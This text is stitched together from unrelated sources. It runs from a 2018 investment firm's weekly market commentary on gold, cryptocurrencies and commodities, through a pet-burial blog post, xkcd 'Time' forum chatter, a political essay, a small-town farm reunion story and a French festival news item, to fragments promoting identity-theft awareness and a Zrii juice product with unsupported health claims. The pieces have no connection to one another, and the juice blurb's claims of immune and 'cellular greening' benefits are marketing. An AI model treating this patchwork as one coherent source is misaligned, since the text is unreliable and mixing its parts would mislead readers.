Despite the headwinds of rising interest rates, gold was the best performing metal this week, although down slightly by 1.24 percent. Gold traders are bullish for the fourth week in a row after the yellow metal posted its biggest monthly advance in five months in January, according to Bloomberg’s weekly survey. The government of India is presenting a policy to develop gold as an asset class and establish a trade-efficient system of regulated gold exchanges. This would allow bank customers to deposit their gold holdings for a fixed period of time in return for a 2.25 percent to 2.50 percent interest rate.
Gold consumption in China rose 9.4 percent in 2017, a big hike from a 6.7 percent slump the previous year. Jewelry demand was also strong at 10.4 percent, up from the 19 percent drop in 2016. The rise in consumption is in part due to lower-tier cities accumulating income and using it to buy gold products.
China’s gold production, on the other hand, dropped 6 percent in 2017, the first major drop since 2000, reports Bloomberg. The reduced production is due to environmental protection taxes, resources taxes and the closure of some mines.
The worst performing metal this week was silver, down 4.63 percent. Bloomberg reports that gold futures dropped this week after hiring and wages picked up in January with nonfarm payrolls rising 200,000, compared with the median estimate for an 180,000 increase. The unemployment rate held at 4.1 percent while average hourly earnings rose 2.9 percent, higher than expected.
A power failure due to a storm on Wednesday night at South Africa’s Sibanye Gold Ltd.’s Beatrix mine left almost 1,000 workers trapped underground overnight. All workers made it out of the mine without injuries after power was restored using backup generators. South Africa has some of the deepest mines in the world and the mine expects to reopen on Monday.
The Democratic Republic of Congo made last minute changes to a mining law that will go into effect immediately and will negatively affect every mining project, reports Bloomberg. DRC lawmakers hiked royalties for mining companies and added a new 50 percent tax on super-profits. The country is the world’s biggest source of cobalt and is potentially raising the royalty from 2 percent to 10 percent on the mineral.
Goldman Sachs is the most bullish it’s been on commodities since 2008, expecting copper to rise 12 percent in the next 12 months to $8,000 a metric ton. Bloomberg Intelligence writes that broad demand versus supply measures are the most favorable in a decade with the CBOE Volatility Index at the lowest for the longest period in 30 years. Bill McQuaker, multi asset investment manager at Fidelity, says that gold is a prudent investment right now because it can perform well regardless of market conditions.
According to Pacific Investment Management Co., the U.S. is fighting and winning a “cold currency” war, as the U.S. dollar has fallen almost 12 percent since the start of 2017. According to Pimco global economic advisor Joachim Fels, a widening trade deficit will foster a continued American interest in a weaker dollar. Bank Credit Analysts released a report showing that the dollar has oscillated between bear markets lasting 10 years and bull markets lasting five years. If this holds true, the dollar’s five-year bull market from 2011 to 2016 fits the pattern of the dollar entering a bear market now for the next 10 or so years.
Matthew Sigel, portfolio strategist at CLSA, released a report detailing that the U.S. dollar has “broken down” after the policy error of tax cuts were passed. This is due to lost relevance as a means of exchange as the dollar percentage of foreign exchange reserves and its use for SWIFT payments continues to decline. In addition, Sigel notes that U.S. recently fell out of the top 10 in the Bloomberg Innovation Index, and in terms of patents, China has filed 10 times more over the last 10 years than the U.S. Gold has historically performed positively when the U.S. dollar is weak.
Wells Fargo analysts are warning of a commodities bear market and said they doubt a weakening dollar will result in commodity performance rising. They released a report saying “We expect bear market dynamics (over-supply and range bound prices) to dominate commodities for the next five to 10 years.” Austin Pickle wrote.
Bloomberg reports that OPEC and Russia will allow prices to rise as high as the market can take. The downside of higher oil prices is that mining costs can rise as well. Unit costs for miners might rise 5 to 10 percent this year as commodity prices are rallying.
Renaissance Technologies, the world’s most profitable hedge fund, warns of a significant risk of a market correction and is preparing for possible market turbulence. The group cites rising valuations as being unjustified entirely by accelerating global growth and corporate tax reform. In the prior week there were all-time highs in money flows into equities.
Of the cryptocurrencies tracked by CoinMarketCap, the best performing for the week ended February 2 was Smartlands, which gained 1,018 percent.
After regulatory crackdowns, China’s first Bitcoin exchange, BTCC, announced that it has been acquired by a Hong Kong-based blockchain investment fund. This acquisition is seen as a positive move that will give BTCC more resources to grow the business and continue operating in the face of heightening regulations.
Europe’s largest utility provider, Enel SpA, is in talks to sell power from renewable energy plans to Swiss cryptocurrency company Envion AG. The deal sparked conversations from other energy providers on whether they should supply excess power to crypto mining companies, as they require huge amounts of electricity to mine digital currencies.
Of the cryptocurrencies tracked by CoinMarketCap, the worst performing for the week ended February 2 was Spectre.ai Utility Token, which lost 50.81 percent. Bitcoin fell below $8,000 this week for the first time since November. The popular cryptocurrency has been trading in a narrow range of $10,000 and $11,000 recently after hitting a peak of $19,000 in December. Bitcoin lost $44.2 billion in market cap and fell 25 percent overall in January.
Last Friday morning in Japan someone hacked into the digital wallet of Japanese cryptocurrency exchange Coincheck to pull off one of the largest heists in history, stealing around $534 million in digital coins, according to Bloomberg Technology. Although Coincheck reassured customers they would be partially reimbursed, this theft has spurred increased calls for regulation.
The U.S. Securities and Exchange Commission (SEC) froze the cryptocurrency assets of Texas-based AriseBank after its initial coin offering raised more than $600 million. The SEC alleges that the company illegally raised funds from investors by not registering with regulators and making misleading statements.
The first two blockchain ETFs, Amplify Transformation Data Sharing ETF (BLOK) and Reality Shares Nasdaq NexGen Economy ETF (BLCN) already have over $250 million in assets under management combined in less than two weeks since they began trading. A third blockchain was launched this week on the NYSE Arca exchange, Innovation Shares LLC’s NexGen Protocol ETF (KOIN).
Tom Lee, head of research at Fundstrat Global Advisors and an early bitcoin investor, spoke with CNBC this week about a new “crypto-rotation” where smaller cryptocurrencies have been rallying as much as 300 percent. Lee describes how this rotation of digital currencies allows investors who missed the initial big wave of investment like bitcoin to invest in the new cycle of booming cryptocurrencies.
Line Corp., Japan’s largest messaging service, has applied for a license to open a cryptocurrency exchange after reporting a $37 million loss for the previous quarter. The company is also considering expanding its cryptocurrency operations to Hong Kong and then Luxembourg.
On Tuesday, South Korea’s Financial Services Commission confirmed that new measures have been implemented tackling the issues of anonymity and money laundering. The new rules only allow trading of cryptocurrencies from real-name bank accounts. Fears of regulation in South Korea, a country with a high volume of digital currency trading, spooked investors and traders earlier this month.
Facebook announced that it will be banning ads that promote cryptocurrencies and initial coin offerings (ICOs) in a measure to prevent users from being exposed to fraudulent operations. The company released a statement saying “We want people to continue to discover and learn about new products and services through Facebook ads without fear of scams or deception.”
The Indian government released a statement this week saying it does not consider cryptocurrencies to be legal tender. Anshul Vashist, a Delhi-based support manager at cryptocurrency Coinsecure, said after the announcement that “people are getting scared” and “we have seen some dumping of bitcoins.” India’s government did, however, indicate that it will be exploring potential adoption of blockchain technology for ushering in the digital economy, reports Bloomberg.
Iron ore was the best performing major commodity this week, rising 3.2 percent. The commodity rallied as Goldman Sachs increased its price forecast, arguing that market participants will look to restock in the coming weeks in anticipation of the proposed end to the steel mill supply curbs this spring.
The best performing sector this week was the Bloomberg Global Coal Producers Index. The index rose 1.2 percent as thermal coal prices rallied on the back of colder weather across China, coupled with gas shortages in regions of the country, leading to bid on thermal coal as a heating fuel substitute.
China Shenhua Energy was the best performing stock in the broader resource market this week. An integrated coal-based energy company in China, Shenhua rallied 7.8 percent for the week to fresh 52-week high. The stock rose on the back of rallying thermal coal prices in China as a result of cold weather fronts and a shortage of natural gas available for heating.
Natural gas prices dropped 16.9 percent this week, the most among major commodities. The commodity dropped the most in at least four years after forecasts for a bone-chilling February in the U.S. have turned warmer.
The worst performing sector this week was the S&P 1500 Construction and Materials Index. The sector dropped 7 percent following President Donald Trump’s State of the Union speech Tuesday. Investors had been looking for more color on any infrastructure bill, but the details were few in number and did not outline any funding sources.
The worst performing stock for the week was Ivanhoe Mines. The Canadian developer of mineral properties in South Africa and the Congo dropped 24.8 percent to a 52-week low. The stock dropped on reports that the Congolese government is considering an onerous increase in royalties that would require a cancellation of contract guarantees, which would significantly raise the cost of doing business in the country.
Crude oil prices posted their best start in five years as the U.S. glut declined. West Texas Intermediate (WTI) crude had its best start since 2013, temporarily advancing above $66 per barrel as U.S. crude inventories capped a record run of declines and are approaching the five-year average.
Thermal coal futures in China rose to a new high amid cold weather warnings and in the face of tight gas supplies as Beijing pushes for less polluting fuels. China’s meteorological service renewed cold weather warnings in western and southern parts of the country while gas supply shortages were reported in the northern part of the country.
Members of OPEC, the Organization of Petroleum Exporting Countries, exceeded crude supply curtailments by the most since the cuts were announced in November 2016. OPEC compliance rose to 127 percent of the agreed cuts, the highest level since 2016, as Venezuela production continues to collapse. Production at the South American nation dropped by 30,000 barrels per day in January alone as the industry continues to battle years of underinvestment.
Fears of a U.S.-China trade war rose again this week after China targeted chemicals imports from the U.S. and he European Union (EU). China’s commerce ministry said that it would launch an anti-dumping review of industrial solvents imported from its main trading partners.
The EU gave President Trump a fresh warning about any U.S. curbs on imports for Europe by pledging swift retaliation, highlighting the risk of a trans-Atlantic trade war. The announcement follows Trump’s decision to invoke rarely used “safeguard” rules to impose tariffs on solar panels from Europe and elsewhere.
China may extend its steel supply curtailments from March all throughout May. According to UBS analysts, if the supply cuts were extended, there is a risk that crude steel output could fall in 2018 relative to 2017. The extension to cut supply could lead traders to panic and advance the timing for restocking.
In an otherwise down week for markets, Malaysia’s FTSE Bursa Malaysia Kuala Lumpur Composite Index easily takes the cake for the last five trading days, finishing (in rather lonely fashion) in the green, up 89 basis points.
Macau casino revenue jumped in January, rising 36 percent year-over-year and coming in ahead of expectations for an increase of only 27 percent growth.
Taiwanese economic growth accelerated into the end of the year. Fourth quarter preliminary GDP growth came in at a year-over-year pace of 3.28 percent, yielding an annual (2017) year-over-year growth rate of 2.84 percent.
Shanghai closed down 2.70 percent for the week, while the Philippines Stock Exchange Index closed down 2.55 percent. India also had a rough week, as both the SENSEX and the NIFTY indices closed down more than 3 percent since Monday (India was closed for Republic Day on January 26, so it is not precisely apples to apples with the other indices since last week, but adequately demonstrates the selling pressures in some global markets this week).
While China’s official Non-manufacturing PMI did beat analysts’ expectations (coming in at 55.3, ahead of an anticipated 54.9), the official Manufacturing PMI missed by a little bit, coming in at 51.3, down from last month’s print and an expected reading of 51.6 for this month. The Caixin China Manufacturing PMI was in line at 51.5, as expected and steady from last month. We’ll get the Caixin Services numbers this weekend.
Industrial production missed in South Korea for the December period, coming in down 6.0 percent, shy of expectations for a decline of only 1.5 percent and down from the prior month’s revised year-over-year decline of 1.7 percent.
“U.S. Firms Are Upbeat on China,” an article in Tuesday’s Wall Street Journal reported, noting that “U.S. companies are more optimistic than a year ago about business prospects in China despite a backdrop of escalating trade tensions and worries over regulation, according to the latest annual survey by the American Chamber of Commerce in China.” Three-quarters of respondents, the article observes, said they “planned to increase investment in China next year.”
Ping An’s health care and technology unit is closer to its Hong Kong IPO, Bloomberg reported this week, noting that the Softbank is now set to invest $400 million in the “Good Doctor” listing.
In the midst of U.K. Prime Minister Theresa May’s recent trip to China, Bloomberg News reported that the U.K. and China will seek to develop a “finance-tech city” in the Xiongan New Area.
Bloomberg reports the Shanghai Environmental Monitoring Center warned that it would be best if the young and elderly tried to stay indoors this week as air pollution reached “heavily polluted” levels, the second-to-worst ranking of air quality.
“China is drafting a proposal to allow gambling on Hainan Island,” Bloomberg News reported people familiar with the talks as having said, “in what would be an unprecedented move that could reshape gaming in China’s territories and transform the economy of a strategic southern province.” While perhaps bullish for the long term, the move—which reportedly considers online gambling but clearly could open the doors to eventual physical casinos—could also represent a threat to Macau’s preeminence. Macau stocks stumbled initially on the news and then took it largely in stride, finishing down relatively mildly on Friday.
India announced this week that the government will seek to eliminate payments using cryptocurrency—not entirely surprising, perhaps, given the Modi administration’s recent demonetization scheme—while nonetheless allegedly embracing the concept of blockchain technology.
The Czech Republic was the best relative performing country this week, losing 25 basis points. Banking stocks were the best performing equites trading on the Prague exchange. Komercni Bank appreciated 2.2 percent, after Raiffeisen Centrobank raised it to a “buy” from a “hold.” Moneta Money Bank gained 1.2 percent after its investment grade rating was reaffirmed by S&P Global Rating Agency.
The Czech koruna was the best performing currency this week, gaining 60 basis points against the U.S. dollar. The central bank of the Czech Republic raised its key rate by 25 basis points to 0.75 percent, in line with expectations. This was the third increase in the past six months.
Poland was the worst performing country this week, losing 2.8 basis points. Poland’s manufacturing PMI reading disappointed, coming in at 54.6 versus expected 55.2. President Andrzej Duda approved this year’s budget; the deficit will be higher than previously calculated.
The Polish zloty was the worst performing currency this week, losing 65 basis points against the U.S. dollar. The central bank of Poland left its main rate unchanged at 1.5 percent. Sharp zloty appreciation over the past couple months is already a substitute of monetary policy tightening, said Eryk Lon, member of the Polish Monetary Policy Council.
According to a report released by Eurostat, the European Union’s statistic agency, the EU bloc grew by 0.6 percent in the fourth quarter, and 2.5 percent in the full year 2017. The preliminary GDP data shows 2017 was the best performing year for growth in the eurozone bloc since 2007, when it recorded economic growth of 3 percent. For the second year, the eurozone grew faster than United States, which expanded by 2.3 percent in 2017. The EU’s manufacturing PMI was reported at 59.6. Slightly weaker than the prior reading of 60.6, but still close to a record high.
Russian equites are the biggest laggards among Emerging Europe stocks in the past 12 months. The MSCI Russia Index gained only 19 percent in the past 12 months, mostly supported by higher oil prices, while the broader MSCI Emerging Europe Index appreciated more than 30 percent during the same period. Once the noise around additional sanctions on Russia settles down, it may be a good time to pick up this underperforming market. According to Wood & Company, the growing dividend payout ratios and a new budget rule are the most important factors that call for higher valuation multiples.
Emerging markets could outperform again in 2018, says Bretton Woods Research Team. Emerging markets should benefit from the weaker dollar. Exporters of commodities, agriculture products and raw materials should perform well during a period of a weaker dollar. The group’s favorite emerging markets are Chile, China, the Czech Republic, Hungary, the Philippines and Russia.
Polish president Andrzej Duda has signed into law a bill that largely limits trade on Sundays. As of March 1, shops and markets will be closed on two Sundays per month, in 2019 only one Sunday a month will be open for shopping; and starting in 2020, there will be no Sunday shopping, with few exceptions. Larger supermarket chains will be the most exposed to this change, as most of their profits are earned during the weekends.
On Wednesday, the European Banking Authority (EBA) formally launched the 2018 EU-wide stress test and unveiled the scenarios against which the largest 48 banks across the eurozone bloc will be tested. It will be a tough test, analyzing banks’ resistance to the bloc’s economy shrinking cumulatively by 8 percent by 2020, or residential-property prices dropping by 27.7 percent. Results are expected to be published by early November.
The current Czech president, Milos Zeman, has secured a second five-year term as a head of the state. His reappointment should have minimal effect of country’s growth which is supported by robust global demand and strong internal monetary and fiscal stimulus, but it is also showing that Czech voters’ are Eurosceptic. Zeman is viewed as anti-immigration, anti-Islam and Eurosceptic with pro-Russian tendencies.
U.S. Global Investors, Inc. is an investment adviser registered with the Securities and Exchange Commission ("SEC"). This does not mean that we are sponsored, recommended, or approved by the SEC, or that our abilities or qualifications in any respect have been passed upon by the SEC or any officer of the SEC.
Certain materials in this commentary may contain dated information. The information provided was current at the time of publication.
Some links above may be directed to third-party websites. U.S. Global Investors does not endorse all information supplied by these websites and is not responsible for their content.
Holdings may change daily. Holdings are reported as of the most recent quarter-end. The following securities mentioned in the article were held by one or more accounts managed by U.S. Global Investors as of (12/31/2017):
The Dow Jones Industrial Average is a price-weighted average of 30 blue chip stocks that are generally leaders in their industry.
The S&P 500 Stock Index is a widely recognized capitalization-weighted index of 500 common stock prices in U.S. companies.
The Russell 2000 Index® is a U.S. equity index measuring the performance of the 2,000 smallest companies in the Russell 3000®, a widely recognized small-cap index.
The Hang Seng Composite Index is a market capitalization-weighted index that comprises the top 200 companies listed on Stock Exchange of Hong Kong, based on average market cap for the 12 months.
The Taiwan Stock Exchange Index is a capitalization-weighted index of all listed common shares traded on the Taiwan Stock Exchange.
The Korea Stock Price Index is a capitalization-weighted index of all common shares and preferred shares on the Korean Stock Exchanges.
The Philadelphia Stock Exchange Gold and Silver Index (XAU) is a capitalization-weighted index that includes the leading companies involved in the mining of gold and silver.
The S&P/TSX Canadian Gold Capped Sector Index is a modified capitalization-weighted index, whose equity weights are capped 25 percent and index constituents are derived from a subset stock pool of S&P/TSX Composite Index stocks.
The S&P 500 Energy Index is a capitalization-weighted index that tracks the companies in the energy sector as a subset of the S&P 500.
The S&P 500 Materials Index is a capitalization-weighted index that tracks the companies in the material sector as a subset of the S&P 500.
The S&P 500 Financials Index is a capitalization-weighted index. The index was developed with a base level of 10 for the 1941-43 base period.
The S&P 500 Industrials Index is a Materials Index is a capitalization-weighted index that tracks the companies in the industrial sector as a subset of the S&P 500.
The S&P 500 Consumer Discretionary Index is a capitalization-weighted index that tracks the companies in the consumer discretionary sector as a subset of the S&P 500.
The S&P 500 Information Technology Index is a capitalization-weighted index that tracks the companies in the information technology sector as a subset of the S&P 500.
The S&P 500 Consumer Staples Index is a Materials Index is a capitalization-weighted index that tracks the companies in the consumer staples sector as a subset of the S&P 500.
The S&P 500 Utilities Index is a capitalization-weighted index that tracks the companies in the utilities sector as a subset of the S&P 500.
The S&P 500 Healthcare Index is a capitalization-weighted index that tracks the companies in the healthcare sector as a subset of the S&P 500.
The S&P 500 Telecom Index is a Materials Index is a capitalization-weighted index that tracks the companies in the telecom sector as a subset of the S&P 500.
The NYSE Arca Gold Miners Index is a modified market capitalization weighted index comprised of publicly traded companies involved primarily in the mining for gold and silver.
The Consumer Price Index (CPI) is one of the most widely recognized price measures for tracking the price of a market basket of goods and services purchased by individuals. The weights of components are based on consumer spending patterns.
The Purchasing Manager’s Index is an indicator of the economic health of the manufacturing sector. The PMI index is based on five major indicators: new orders, inventory levels, production, supplier deliveries and the employment environment.
The S&P/TSX Venture Composite Index is a broad market indicator for the Canadian venture capital market. The index is market capitalization weighted and, at its inception, included 531 companies. A quarterly revision process is used to remove companies that comprise less than 0.05% of the weight of the index, and add companies whose weight, when included, will be greater than 0.05% of the index.
The S&P GSCI Total Return Index in USD is widely recognized as the leading measure of general commodity price movements and inflation in the world economy. Index is calculated primarily on a world production weighted basis, comprised of the principal physical commodities futures contracts.
There is no guarantee that the issuers of any securities will declare dividends in the future or that, if declared, will remain at current levels or increase over time.
The Goldman Sachs Commodity Index is a composite index of commodity sector returns, representing an unleveraged, long-only investment in commodity futures that is broadly diversified across the spectrum of commodities.
The MSCI Russia 10/40 Index is calculated from the MSCI Russia Index, a market capitalization-weighted index designed to measure equity market performance in Russia. MSCI 10/40 Equity Indices are calculated with a base level of 100 as of December 31, 1998.
The MSCI Emerging Markets Europe Index is a free float-adjusted market capitalization index that is designed to measure equity market performance in the emerging markets countries of Europe (Czech Republic, Hungary, Poland, Russia, and Turkey).
The FTSE Bursa Malaysia Index Series is a broad range of real-time indices, which cover all eligible companies listed on the Bursa Malaysia Main and ACE Markets. The indices are designed to measure the performance of the major capital segments of the Malaysian market, dividing it into large, mid, small cap, fledgling and Shariah-compliant series, giving market participants a wide selection and the flexibility to measure, invest and create products in these distinct segments.
The Philippine Stock Exchange PSEi Index is composed of stocks representative of the industrial, properties, services, holding firms, financial and mining & oil sectors of the Philippines Stock Exchange.
The S&P BSE SENSEX Index is a free-float market-weighted stock market index of 30 well-established and financially sound companies listed on the Bombay Stock Exchange.
The Caixin China Manufacturing PMI (Purchasing Managers' Index) is based on data compiled from monthly replies to questionnaires sent to purchasing executives in over 400 private manufacturing sector companies.
The Bloomberg Global Coal Producers Index is a capitalization-weighted index comprised of companies from the coal production industry.
The S&P 500 Construction Materials Index is a capitalization-weighted index that tracks the companies in the construction materials industry as a subset of the S&P 500.
The employment cost index (ECI) is a quarterly economic series detailing the changes in the costs of labor for businesses in the United States economy.
Chicago Board Options Exchange (CBOE) Volatility Index (VIX) shows the market's expectation of 30-day volatility.
Certain materials on the web page may contain dated information. The information provided was current at the time of publication.
All opinions expressed and data provided are subject to change without notice. Some of these opinions may not be appropriate to every investor.
©2018 U.S. Global Investors, Inc. All Rights Reserved. Foreside Fund Services, LLC, Distributor. U.S. Global Investors is the investment Adviser.
Yup. white & blond with green but lifeless eyes. She is an alluring beauty with a sexy bush. She wears a pink collar with a cute bell...and that didnt save her from being a victim of a possible hit&run...without any claimant, she is thus a Jane Puss
I buried her in the western corner of Pepper's Park, right next to Mei-Mei (the black & white adorable young pooch, suspected to be poisoned by its very own owner... )
In under 18days, i have buried 2 beautiful animals. With borrowed cangkul and spade, the lender commented that I am now a very experienced, pro bono animal grave digger!
Disclaimer: While we work to ensure that product information is correct, on occasion manufacturers may alter their ingredient lists. Actual product packaging and materials may contain more and/or different information than that shown on our Web site. We recommend that you do not solely rely on the information presented and that you always read labels, warnings, and directions before using or consuming a product. For additional information about a product, please contact the manufacturer. Content on this site is for reference purposes and is not intended to substitute for advice given by a physician, pharmacist, or other licensed health-care professional. You should not use this information as self-diagnosis or for treating a health problem or disease. Contact your health-care provider immediately if you suspect that you have a medical problem. Information and statements regarding dietary supplements have not been evaluated by the Food and Drug Administration and are not intended to diagnose, treat, cure, or prevent any disease or health condition.
I'd like to consider myself a heavy hitter, despite my post rate. I'm just always stuck in the past and I like to post responsibly. Now I'm getting hassled by the phone company for how I use the internet I pay for, so we'll see if that also effects my posting rate. I hope not. *hoping*
It looks like Megan just filled in a bit and is now digging out an archway so there will be a mini bridge to that left hand tower
What's the phone company up to? We are a bit bandwidth-challenged here in NZ I am told, but so far I haven't been a serious-enough user to notice.
In a Comically Tragic Turn of Events Addams Didn't Die. Please help. (Wait, does that sound like I want you to kill addams?)
If it looks like a duck, and quacks like a duck, we have at least to consider the possibility that we have a small aquatic bird of the family Anatidae on our hands. –Douglas Adams
Purplepants77 wrote: EDIT: Good thing this whole PFAN was discontinued, I would make an awfully terrible one at this particular moment in Time
Just awoke from coma so catching up... is it weird that I dreamed about the One True Comic, this needle-pulled-thing, and that Pope Helper had returned, and his returning post was first on a page, so making him simultaneously Pope and Pope for a Page ?
lmjb1964 wrote: Well, you can have an antecedent (which comes before something else, I know...) so why not a transcedent? But yeah, never noticed my own sig had a spelling error. I mean, no it didn't, it was spelled right the whole time...
It turns out, you cannot argue with the Latin Police. Or at least I can't. So here is my solemn declaration of guilt which I have signed on my own free will entirely without any coercion of any kind by any police, and especially not by the Latin Police:
Thank you, oh patriarchal one. I can't really let you take the blame, but well, since you offered, sure!
SWO Crash wrote: Having been a follower of Time since almost the beginning (NP 9, 10?) and a reader of the needle-pulled-thing off and on (because, honestly, it's fascinating), I have come across this pondering - might the followers of Time find a kinship with the members of the (U.S.) military? After all, we are told to "hurry up and wait (for it)."
Although in Time we don't have the "Hurry up" part, just the "Wait for it." But as we are all waiting, I would say there is indeed a kinship. Peace to you as well!
Help addams stay in her home! https://www.crowdrise.com/in-a-comically-tragic-turn-of-events-addams-didnt-die
Unlike certain other users who I could mention (you know who you are), I actually read the day's newposts... It takes a certain amount of mentally unstable dedication to do so, but I do it anyway. Better than Outside entertainment, anyway.
As a parting note before I go off to coma (this is becoming a pattern, isn't it, me posting right before I coma), the latest additions make the top bit look sort of like some eastern asian temples...
Maybe the design is sweeping eastwards across the globe? Maybe this is all a metaphor for how we view ourselves as civilized even if others were demonstrably more so hundreds of years before? Maybe we're all reading into this far too much*?
I'm still around. Been working late nights, which gives me good reason to avoid coma, as well as keep checking in when I feel like slacking.
"If my calculations are correct, when this baby hits 88 miles per hour... you're gonna see some serious shit." —Doc Brown
ChronosDragon wrote: Probably the last American up here, just been catching up on the 7+ pages I missed today.
Nope, I'm still up, here on Pacific time. It's pretty lonely at the moment, though better than it was about 20 minutes ago when it was just me a couple other users, and a couple of bots. Must be time to coma.
Well, according to this graph, cmyk and Helper's posting habits don't line up, so I don't think they're the same.
You have to wait 9 days for the weather to pass and the flood waters to recede before continuing on your Quest. About mid morning you come across a poor soul who got stuck in the mud and must have drowned in the rising flood waters. It seem someone has found him already and stripped anything valuable and left him propped up on four large bricks. You continue on your westward quest for two more days before coming to a deep chasm. Their is a rope bridge to the north but as you approach it find an old man with a bunch of viscous looking Dogs. They look like Rottweilers and you can count 13 of them. When you get within ear shot of the man he speaks up and in a very strange accent says: "Qba'g jbeel nobhg gur qbtf. Lbh pna pebff vs lbh jnag. Whfg qba'g jnyx onpxjneqf nf gurl ungr gung naq znl nggnpx!". You try to talk to him but he seems not to understand your speech either.
As far as the hats go, I think it's safe to say that I'm pretty well set. Unless my hat, pre-dating Time itself, needs a hat of its own??
mojacardave wrote: Tracker of the top ten posters on this thread (up to TimeFrame 720). This graph is corrected for the period shift at TimeFrame 240, and so is grouped by total number of posts in a ten hour period. Looks like none of the top ten posters were present on the forum in the first day.
EDIT TO ADD: The top ten are in reverse order on the legend. It's fixable but faffy, and I really couldn't be bothered.
Actually, my first post in this thread was in the first day, by most ways of reckoning it. It just wasn't quite within the first 20 hours 40 NewPices; just 3 NewPices too late to make that cut.
We can rebuild it. We have the technology. We can make it better than it was. Better … stronger … well, maybe not faster.
Oh right, I was wondering if there was somewhere that automatically stores the hashes. Good to know that posting them here is not necessary.
astrotter wrote: It is not particularly clear to me at this time that we are not overanalyzing this...
That top level is beginning to look a bit like Makaryev Monastery (as featured in the film Salt (another photo here).
Eutychus wrote: That top level is beginning to look a bit like Makaryev Monastery (as featured in the film Salt (another photo here).
I can see what you mean, but I'm not sure that it looks any more like that than any other castle-y building in a walled compound, especially given that it lacks the little bridge, and cantilevered tower, etc. And I've never bought any of the ideas that any particular sandcastle is supposed to be representative of something from the Outside.
patzer wrote: There was a HUGE error on the explainxkcd and xkcd-time wikis where about 60 files had the wrong name. I am currently correcting that.
Indeed. It seems unlikely that they don't understand the sea (big!), don't know if there's more than one river (small!), but do have in-depth knowledge of Outside castles.
Huh. I was POTP last page under the old rules, and all I did was announce that I was going to coma. Ah well, you all escape my Papal tyranny. This time!
HAL9000 wrote: I find it simultaneously fascinating and disturbing that the most profound things I've read in the past months I have encountered in or been led to by an internet forum thread about a webcomic.
That's a mighty narrow sand bridge. Bets on how many TimeFrames it'll last before Cueball breaks it?
Many of us of the ‘older generation’ remember a time before the internet, before the digital age. People actually sent hand written letters and hoped for a reply in a few weeks. Air travel was a big deal. Television was only during afternoon and evening, if that. The rest of the time you viewed a test pattern. Everyone got a read a morning or evening newspaper. When you went to the movies the preliminary short subjects always included a news reel summary of world and national news. In brief, the pace of life and living was much slower than today. In fact, the pace of life and living for all of humanity has been much slower and the human race has evolved accordingly.
Today communication is almost instantaneous. Our smart phones keep us connected to the news and our social networks. News outlets abound. All hardcopy, from letters, to newspapers, to currency are in decline, replaced by a digital counterpart. Transactions are near instantaneous. ‘Apps’ on our smart devices and computers take the time out of previously time consuming tasks. They even take the ‘thought’ out of previously mentally taxing endeavors.
Technology is driving the increased pace of our lives. With the conveniences enabled by technology also comes problem, challenges and risk. The digital environment brings ever present risk of identity theft, computer hacking and digital fraud, worldwide secure communication and terrorist plots. We are continuously faced with new information, new circumstances and the need for new solutions. This is true at all levels from personal, to family, to community, to nation, to global.
Climate change is accelerating. It effects us in multiple ways. Severe storms disrupt and dislocate people. Agricultural areas are changing. Forests are changing due to insect infestation.
Immigration and refugees are on the rise. Climate change with coastal flooding as well as terrorism and ethnic conflicts promise to keep the trend in tact and probably increase.
All of this change is coming at an ever increasing rate. If any trend were to be spread over a decade or a generation our society and global societies would deal with the impact. Unfortunately that is not the case. Immigrants and refugees are accused of taking jobs away from our citizens. Climate effects are straining budgets and taking resources from social welfare programs. The pressures are resulting in impulsive decisions in our democracy, not the debate and concerns for all peoples. Citizens are becoming polarized and putting our democratic processes at risk.
What to do? Not easy. However, one thing is clear – government must take the lead. Things on the agenda include 1) policy to minimize climate change, 2) policy to help workers when industries are relocated, off-shored or automated, 3) the creation of affordable and accessible education and skills training, and 4) compassionate and economy friendly immigration policy. For government to embrace this reality it needs citizen representatives that are committed to finding solutions to today’s reality. My role and yours – be active in helping to make this happen.
Excerpts From: “The Stock Market is Shrinking. That’s a Problem for Everyone”, NY Times October 29, 2018
A retired research physicist who lived and experienced the 50's through the present, and reflects on the experiences of those years versus the present. The ideas and opinions are liberal biased but fully considerate of realistic limitations imposed by considering a long view of the future.
The first amendment of the constitution declares: “Congress shall make no law … abridging the freedom of speech, or… The post Freedom of Speech – Absolute Freedom? appeared first on Democracy Forum.
This is excellent insight. The bottom line take away is: Conservatives who attend church have more moderate views than… The post Excerpts From: The Liberalism of the Religious Right – New York Times appeared first on Democracy Forum.
In simple terms, Fascism is “one party dictatorship”. We in America typically view our democracy as strong, a global… The post American Fascism – A Real Threat? appeared first on Democracy Forum.
The neighbors are friendly, our mail gets hand delivered by the sweetest four year-old and the barn cats make for great entertainment.
So it's no wonder that more than a hundred family, friends and neighbors were happy to return to the farm where they've developed their own memories last weekend for the Jurn family reunion.
As much as the weekend was about familiar faces and the scenery, the star of the show was undoubtedly of the machinery variety.
Everyone stopped to admire the newly restored 1936 Chevrolet farm truck. Gleaming in green, the old workhorse had been transformed from its weathered self by Kevin Jurn and Dan Potter.
Duane said his grandfather purchased it in 1938. For many years, it made a weekly trip up to Yale for feed.
The reunion and Capac's own 150th celebration was just the impetus for Duane to call up his cousins and see that the restoration was complete.
Dan's wife Cindy made the project complete with an album of 'before' and 'after' photos and some of the guys hard at work.
Fortunately, just about everybody in Capac had the chance to see the truck in Saturday's parade. Duane and his uncle, Glenn, waved from the cab while Duane's siblings—Debbie, Diane, Donna, Deana, Denise and Dennis—perched atop bales on the bed.
Duane's great-grandfather established the farm on Metcalf back in 1890 and they've milked cows for decades and continue today.
The truck, the reunion, the festival—it all was a good reminder of what makes it so enjoyable to live here. People still hold a connection to the land, appreciate family history and relish the chance to celebrate milestones together.
Congratulations too to the Chamber of Commerce and all the volunteers who made the sesquicentennial a smashing success.
Il est possible que le festival annuel Ground Zero à Bussloo arrête définitivement ses activités. Ceci est dû à une proposition de B et W van Voorst concernant la politique d’évènementiel à Bussloo. Avec cette proposition, la commune désire clarifier l’organisation d’évènements au domaine récréatif et surtout prévenir que la commune soit à nouveau traînée en justice par les habitants de ce quartier. C’est ce qui est arrivé cette année et l’année précédente à cause du festival Xnoizz.
Have you fell victim to identity theft? If you have your not alone as identity theft is now the number one crime in the U.S. There is an array of different forms of identity theft, but internet identity theft is by far the biggest problem. With hundreds of thousands of credit card transactions going through the internet on a daily basis and hackers becoming increasingly knowledgeable, it is getting to the point where it is risky to shop online. There are several ways yo...
Zrii is based on the fruit of the old fruit of the ayurveda practices by the medical India, amalaki. Zrii is a liquid nutrition preparation. The fruit is a very strong one, which is picked by hand, pressed with cold, and then combined with six abiding actives and inhibitors, which results in high-content juices promoting cellular greening, improved functioning of the immune and enhanced energy. For people looking to get rich overnight, this is not the lane to enter. But if...
